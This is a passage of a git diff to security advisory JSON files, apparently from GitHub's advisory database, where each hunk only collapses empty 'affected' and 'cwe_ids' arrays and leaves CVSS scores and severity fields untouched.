@@ "score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f5x9-j9rr-qwgg/GHSA-f5x9-j9rr-qwgg.json b/advisories/unreviewed/2022/05/GHSA-f5x9-j9rr-qwgg/GHSA-f5x9-j9rr-qwgg.json index dee88903a25..0dc50a1a338 100644 --- a/advisories/unreviewed/2022/05/GHSA-f5x9-j9rr-qwgg/GHSA-f5x9-j9rr-qwgg.json +++ b/advisories/unreviewed/2022/05/GHSA-f5x9-j9rr-qwgg/GHSA-f5x9-j9rr-qwgg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -75,9 +73,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f6hw-fm99-824w/GHSA-f6hw-fm99-824w.json b/advisories/unreviewed/2022/05/GHSA-f6hw-fm99-824w/GHSA-f6hw-fm99-824w.json index c51ce97fcd0..cfd2a9d640b 100644 --- a/advisories/unreviewed/2022/05/GHSA-f6hw-fm99-824w/GHSA-f6hw-fm99-824w.json +++ b/advisories/unreviewed/2022/05/GHSA-f6hw-fm99-824w/GHSA-f6hw-fm99-824w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f6w3-x639-853j/GHSA-f6w3-x639-853j.json b/advisories/unreviewed/2022/05/GHSA-f6w3-x639-853j/GHSA-f6w3-x639-853j.json index 05740e95653..53f3d55da8b 100644 --- a/advisories/unreviewed/2022/05/GHSA-f6w3-x639-853j/GHSA-f6w3-x639-853j.json +++ b/advisories/unreviewed/2022/05/GHSA-f6w3-x639-853j/GHSA-f6w3-x639-853j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f7mm-6xgv-fc2v/GHSA-f7mm-6xgv-fc2v.json b/advisories/unreviewed/2022/05/GHSA-f7mm-6xgv-fc2v/GHSA-f7mm-6xgv-fc2v.json index fb772262e96..a4b9b3a8035 100644 --- a/advisories/unreviewed/2022/05/GHSA-f7mm-6xgv-fc2v/GHSA-f7mm-6xgv-fc2v.json +++ b/advisories/unreviewed/2022/05/GHSA-f7mm-6xgv-fc2v/GHSA-f7mm-6xgv-fc2v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fc5j-w949-6j7g/GHSA-fc5j-w949-6j7g.json b/advisories/unreviewed/2022/05/GHSA-fc5j-w949-6j7g/GHSA-fc5j-w949-6j7g.json index aaa6e5f96ba..726d63c2717 100644 --- a/advisories/unreviewed/2022/05/GHSA-fc5j-w949-6j7g/GHSA-fc5j-w949-6j7g.json +++ b/advisories/unreviewed/2022/05/GHSA-fc5j-w949-6j7g/GHSA-fc5j-w949-6j7g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-fcfp-r563-hhgp/GHSA-fcfp-r563-hhgp.json b/advisories/unreviewed/2022/05/GHSA-fcfp-r563-hhgp/GHSA-fcfp-r563-hhgp.json index 141969b1060..297e755b4fa 100644 --- a/advisories/unreviewed/2022/05/GHSA-fcfp-r563-hhgp/GHSA-fcfp-r563-hhgp.json +++ b/advisories/unreviewed/2022/05/GHSA-fcfp-r563-hhgp/GHSA-fcfp-r563-hhgp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-ff6f-6jr9-2g3m/GHSA-ff6f-6jr9-2g3m.json b/advisories/unreviewed/2022/05/GHSA-ff6f-6jr9-2g3m/GHSA-ff6f-6jr9-2g3m.json index d0fe6370d51..d2e88f5c020 100644 --- a/advisories/unreviewed/2022/05/GHSA-ff6f-6jr9-2g3m/GHSA-ff6f-6jr9-2g3m.json +++ b/advisories/unreviewed/2022/05/GHSA-ff6f-6jr9-2g3m/GHSA-ff6f-6jr9-2g3m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-fffr-8f3p-2cqm/GHSA-fffr-8f3p-2cqm.json b/advisories/unreviewed/2022/05/GHSA-fffr-8f3p-2cqm/GHSA-fffr-8f3p-2cqm.json index 12bef5f62e7..27c2431a0d8 100644 --- a/advisories/unreviewed/2022/05/GHSA-fffr-8f3p-2cqm/GHSA-fffr-8f3p-2cqm.json +++ b/advisories/unreviewed/2022/05/GHSA-fffr-8f3p-2cqm/GHSA-fffr-8f3p-2cqm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-fg6p-6p6x-xrvh/GHSA-fg6p-6p6x-xrvh.json b/advisories/unreviewed/2022/05/GHSA-fg6p-6p6x-xrvh/GHSA-fg6p-6p6x-xrvh.json index 7442a2eb716..cf2385785f4 100644 --- a/advisories/unreviewed/2022/05/GHSA-fg6p-6p6x-xrvh/GHSA-fg6p-6p6x-xrvh.json +++ b/advisories/unreviewed/2022/05/GHSA-fg6p-6p6x-xrvh/GHSA-fg6p-6p6x-xrvh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fg8v-7fwx-cc77/GHSA-fg8v-7fwx-cc77.json b/advisories/unreviewed/2022/05/GHSA-fg8v-7fwx-cc77/GHSA-fg8v-7fwx-cc77.json index a8760339082..ddcd7854269 100644 --- a/advisories/unreviewed/2022/05/GHSA-fg8v-7fwx-cc77/GHSA-fg8v-7fwx-cc77.json +++ b/advisories/unreviewed/2022/05/GHSA-fg8v-7fwx-cc77/GHSA-fg8v-7fwx-cc77.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-fj56-772w-rr26/GHSA-fj56-772w-rr26.json b/advisories/unreviewed/2022/05/GHSA-fj56-772w-rr26/GHSA-fj56-772w-rr26.json index a6e92f4203a..3362dbe9d3b 100644 --- a/advisories/unreviewed/2022/05/GHSA-fj56-772w-rr26/GHSA-fj56-772w-rr26.json +++ b/advisories/unreviewed/2022/05/GHSA-fj56-772w-rr26/GHSA-fj56-772w-rr26.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-fjq2-cmr9-3f6m/GHSA-fjq2-cmr9-3f6m.json b/advisories/unreviewed/2022/05/GHSA-fjq2-cmr9-3f6m/GHSA-fjq2-cmr9-3f6m.json index 88cf0cca824..d174f043e54 100644 --- a/advisories/unreviewed/2022/05/GHSA-fjq2-cmr9-3f6m/GHSA-fjq2-cmr9-3f6m.json +++ b/advisories/unreviewed/2022/05/GHSA-fjq2-cmr9-3f6m/GHSA-fjq2-cmr9-3f6m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-fjqj-h7vc-5779/GHSA-fjqj-h7vc-5779.json b/advisories/unreviewed/2022/05/GHSA-fjqj-h7vc-5779/GHSA-fjqj-h7vc-5779.json index 3141a569e28..d8890d18e44 100644 --- a/advisories/unreviewed/2022/05/GHSA-fjqj-h7vc-5779/GHSA-fjqj-h7vc-5779.json +++ b/advisories/unreviewed/2022/05/GHSA-fjqj-h7vc-5779/GHSA-fjqj-h7vc-5779.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-fq4p-86v9-5w3x/GHSA-fq4p-86v9-5w3x.json b/advisories/unreviewed/2022/05/GHSA-fq4p-86v9-5w3x/GHSA-fq4p-86v9-5w3x.json index c28b8b2f061..8bf71bbb381 100644 --- a/advisories/unreviewed/2022/05/GHSA-fq4p-86v9-5w3x/GHSA-fq4p-86v9-5w3x.json +++ b/advisories/unreviewed/2022/05/GHSA-fq4p-86v9-5w3x/GHSA-fq4p-86v9-5w3x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -43,9 +41,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-fvm8-gh5m-69gf/GHSA-fvm8-gh5m-69gf.json b/advisories/unreviewed/2022/05/GHSA-fvm8-gh5m-69gf/GHSA-fvm8-gh5m-69gf.json index 8a7ca31301e..fc6c296ce8c 100644 --- a/advisories/unreviewed/2022/05/GHSA-fvm8-gh5m-69gf/GHSA-fvm8-gh5m-69gf.json +++ b/advisories/unreviewed/2022/05/GHSA-fvm8-gh5m-69gf/GHSA-fvm8-gh5m-69gf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-fww5-xv47-fvxx/GHSA-fww5-xv47-fvxx.json b/advisories/unreviewed/2022/05/GHSA-fww5-xv47-fvxx/GHSA-fww5-xv47-fvxx.json index 54dda659253..b5355b2c62c 100644 --- a/advisories/unreviewed/2022/05/GHSA-fww5-xv47-fvxx/GHSA-fww5-xv47-fvxx.json +++ b/advisories/unreviewed/2022/05/GHSA-fww5-xv47-fvxx/GHSA-fww5-xv47-fvxx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-fx4x-6xm6-5h7h/GHSA-fx4x-6xm6-5h7h.json b/advisories/unreviewed/2022/05/GHSA-fx4x-6xm6-5h7h/GHSA-fx4x-6xm6-5h7h.json index 828abe7fb8d..2c498867dd1 100644 --- a/advisories/unreviewed/2022/05/GHSA-fx4x-6xm6-5h7h/GHSA-fx4x-6xm6-5h7h.json +++ b/advisories/unreviewed/2022/05/GHSA-fx4x-6xm6-5h7h/GHSA-fx4x-6xm6-5h7h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fx6q-gmv8-6h35/GHSA-fx6q-gmv8-6h35.json b/advisories/unreviewed/2022/05/GHSA-fx6q-gmv8-6h35/GHSA-fx6q-gmv8-6h35.json index 4210adff7d8..45ac1c2cc28 100644 --- a/advisories/unreviewed/2022/05/GHSA-fx6q-gmv8-6h35/GHSA-fx6q-gmv8-6h35.json +++ b/advisories/unreviewed/2022/05/GHSA-fx6q-gmv8-6h35/GHSA-fx6q-gmv8-6h35.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-fxf7-p97x-xcch/GHSA-fxf7-p97x-xcch.json b/advisories/unreviewed/2022/05/GHSA-fxf7-p97x-xcch/GHSA-fxf7-p97x-xcch.json index cdcb0e38490..cf8d0e0b882 100644 --- a/advisories/unreviewed/2022/05/GHSA-fxf7-p97x-xcch/GHSA-fxf7-p97x-xcch.json +++ b/advisories/unreviewed/2022/05/GHSA-fxf7-p97x-xcch/GHSA-fxf7-p97x-xcch.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g23h-w3hq-rp9h/GHSA-g23h-w3hq-rp9h.json b/advisories/unreviewed/2022/05/GHSA-g23h-w3hq-rp9h/GHSA-g23h-w3hq-rp9h.json index a5bc8636d8f..2b67c3a180b 100644 --- a/advisories/unreviewed/2022/05/GHSA-g23h-w3hq-rp9h/GHSA-g23h-w3hq-rp9h.json +++ b/advisories/unreviewed/2022/05/GHSA-g23h-w3hq-rp9h/GHSA-g23h-w3hq-rp9h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-g3p6-qm7w-r5mq/GHSA-g3p6-qm7w-r5mq.json b/advisories/unreviewed/2022/05/GHSA-g3p6-qm7w-r5mq/GHSA-g3p6-qm7w-r5mq.json index 4f5458fa1a0..25759fe2c95 100644 --- a/advisories/unreviewed/2022/05/GHSA-g3p6-qm7w-r5mq/GHSA-g3p6-qm7w-r5mq.json +++ b/advisories/unreviewed/2022/05/GHSA-g3p6-qm7w-r5mq/GHSA-g3p6-qm7w-r5mq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-g3qj-r44h-h7qx/GHSA-g3qj-r44h-h7qx.json b/advisories/unreviewed/2022/05/GHSA-g3qj-r44h-h7qx/GHSA-g3qj-r44h-h7qx.json index 541aef78bee..ef9fd710d7c 100644 --- a/advisories/unreviewed/2022/05/GHSA-g3qj-r44h-h7qx/GHSA-g3qj-r44h-h7qx.json +++ b/advisories/unreviewed/2022/05/GHSA-g3qj-r44h-h7qx/GHSA-g3qj-r44h-h7qx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-g3r4-3cw9-j3p7/GHSA-g3r4-3cw9-j3p7.json b/advisories/unreviewed/2022/05/GHSA-g3r4-3cw9-j3p7/GHSA-g3r4-3cw9-j3p7.json index cb7a75dff74..0f5fd5be5f9 100644 --- a/advisories/unreviewed/2022/05/GHSA-g3r4-3cw9-j3p7/GHSA-g3r4-3cw9-j3p7.json +++ b/advisories/unreviewed/2022/05/GHSA-g3r4-3cw9-j3p7/GHSA-g3r4-3cw9-j3p7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g44r-qfh9-rcj9/GHSA-g44r-qfh9-rcj9.json b/advisories/unreviewed/2022/05/GHSA-g44r-qfh9-rcj9/GHSA-g44r-qfh9-rcj9.json index 2aee46e7266..a8223da6bad 100644 --- a/advisories/unreviewed/2022/05/GHSA-g44r-qfh9-rcj9/GHSA-g44r-qfh9-rcj9.json +++ b/advisories/unreviewed/2022/05/GHSA-g44r-qfh9-rcj9/GHSA-g44r-qfh9-rcj9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-g5m9-qp27-rc7w/GHSA-g5m9-qp27-rc7w.json b/advisories/unreviewed/2022/05/GHSA-g5m9-qp27-rc7w/GHSA-g5m9-qp27-rc7w.json index 3e62c1174d3..e378bb44796 100644 --- a/advisories/unreviewed/2022/05/GHSA-g5m9-qp27-rc7w/GHSA-g5m9-qp27-rc7w.json +++ b/advisories/unreviewed/2022/05/GHSA-g5m9-qp27-rc7w/GHSA-g5m9-qp27-rc7w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g7fp-c8p5-c8h7/GHSA-g7fp-c8p5-c8h7.json b/advisories/unreviewed/2022/05/GHSA-g7fp-c8p5-c8h7/GHSA-g7fp-c8p5-c8h7.json index b1ee2b28481..8b796f38694 100644 --- a/advisories/unreviewed/2022/05/GHSA-g7fp-c8p5-c8h7/GHSA-g7fp-c8p5-c8h7.json +++ b/advisories/unreviewed/2022/05/GHSA-g7fp-c8p5-c8h7/GHSA-g7fp-c8p5-c8h7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-g85m-76fr-fj4x/GHSA-g85m-76fr-fj4x.json b/advisories/unreviewed/2022/05/GHSA-g85m-76fr-fj4x/GHSA-g85m-76fr-fj4x.json index 5805ced7033..1f7813429c4 100644 --- a/advisories/unreviewed/2022/05/GHSA-g85m-76fr-fj4x/GHSA-g85m-76fr-fj4x.json +++ b/advisories/unreviewed/2022/05/GHSA-g85m-76fr-fj4x/GHSA-g85m-76fr-fj4x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-g8cj-jqcx-5mxf/GHSA-g8cj-jqcx-5mxf.json b/advisories/unreviewed/2022/05/GHSA-g8cj-jqcx-5mxf/GHSA-g8cj-jqcx-5mxf.json index 4eea16092c2..a52aef4ead7 100644 --- a/advisories/unreviewed/2022/05/GHSA-g8cj-jqcx-5mxf/GHSA-g8cj-jqcx-5mxf.json +++ b/advisories/unreviewed/2022/05/GHSA-g8cj-jqcx-5mxf/GHSA-g8cj-jqcx-5mxf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-g8rv-mgp3-72f2/GHSA-g8rv-mgp3-72f2.json b/advisories/unreviewed/2022/05/GHSA-g8rv-mgp3-72f2/GHSA-g8rv-mgp3-72f2.json index af91fb6907f..699fb4ce2fb 100644 --- a/advisories/unreviewed/2022/05/GHSA-g8rv-mgp3-72f2/GHSA-g8rv-mgp3-72f2.json +++ b/advisories/unreviewed/2022/05/GHSA-g8rv-mgp3-72f2/GHSA-g8rv-mgp3-72f2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-g9hf-p224-484w/GHSA-g9hf-p224-484w.json b/advisories/unreviewed/2022/05/GHSA-g9hf-p224-484w/GHSA-g9hf-p224-484w.json index 42dc0496bd6..162c309db72 100644 --- a/advisories/unreviewed/2022/05/GHSA-g9hf-p224-484w/GHSA-g9hf-p224-484w.json +++ b/advisories/unreviewed/2022/05/GHSA-g9hf-p224-484w/GHSA-g9hf-p224-484w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-gg75-8696-pm3p/GHSA-gg75-8696-pm3p.json b/advisories/unreviewed/2022/05/GHSA-gg75-8696-pm3p/GHSA-gg75-8696-pm3p.json index ab97e9813f1..6cb1387f4f7 100644 --- a/advisories/unreviewed/2022/05/GHSA-gg75-8696-pm3p/GHSA-gg75-8696-pm3p.json +++ b/advisories/unreviewed/2022/05/GHSA-gg75-8696-pm3p/GHSA-gg75-8696-pm3p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gh3w-j6fm-c4f7/GHSA-gh3w-j6fm-c4f7.json b/advisories/unreviewed/2022/05/GHSA-gh3w-j6fm-c4f7/GHSA-gh3w-j6fm-c4f7.json index 73ac61f1f69..d9db2eefa6c 100644 --- a/advisories/unreviewed/2022/05/GHSA-gh3w-j6fm-c4f7/GHSA-gh3w-j6fm-c4f7.json +++ b/advisories/unreviewed/2022/05/GHSA-gh3w-j6fm-c4f7/GHSA-gh3w-j6fm-c4f7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-ghqp-4375-rwc7/GHSA-ghqp-4375-rwc7.json b/advisories/unreviewed/2022/05/GHSA-ghqp-4375-rwc7/GHSA-ghqp-4375-rwc7.json index 77371e6937e..1b88594283d 100644 --- a/advisories/unreviewed/2022/05/GHSA-ghqp-4375-rwc7/GHSA-ghqp-4375-rwc7.json +++ b/advisories/unreviewed/2022/05/GHSA-ghqp-4375-rwc7/GHSA-ghqp-4375-rwc7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-gp3p-g3f7-7r84/GHSA-gp3p-g3f7-7r84.json b/advisories/unreviewed/2022/05/GHSA-gp3p-g3f7-7r84/GHSA-gp3p-g3f7-7r84.json index ca5565ab7dd..2e0f65380e1 100644 --- a/advisories/unreviewed/2022/05/GHSA-gp3p-g3f7-7r84/GHSA-gp3p-g3f7-7r84.json +++ b/advisories/unreviewed/2022/05/GHSA-gp3p-g3f7-7r84/GHSA-gp3p-g3f7-7r84.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-gpc3-36c5-wg2w/GHSA-gpc3-36c5-wg2w.json b/advisories/unreviewed/2022/05/GHSA-gpc3-36c5-wg2w/GHSA-gpc3-36c5-wg2w.json index 88c1403fde8..671b2c29637 100644 --- a/advisories/unreviewed/2022/05/GHSA-gpc3-36c5-wg2w/GHSA-gpc3-36c5-wg2w.json +++ b/advisories/unreviewed/2022/05/GHSA-gpc3-36c5-wg2w/GHSA-gpc3-36c5-wg2w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-gpqh-6jq2-jrg3/GHSA-gpqh-6jq2-jrg3.json 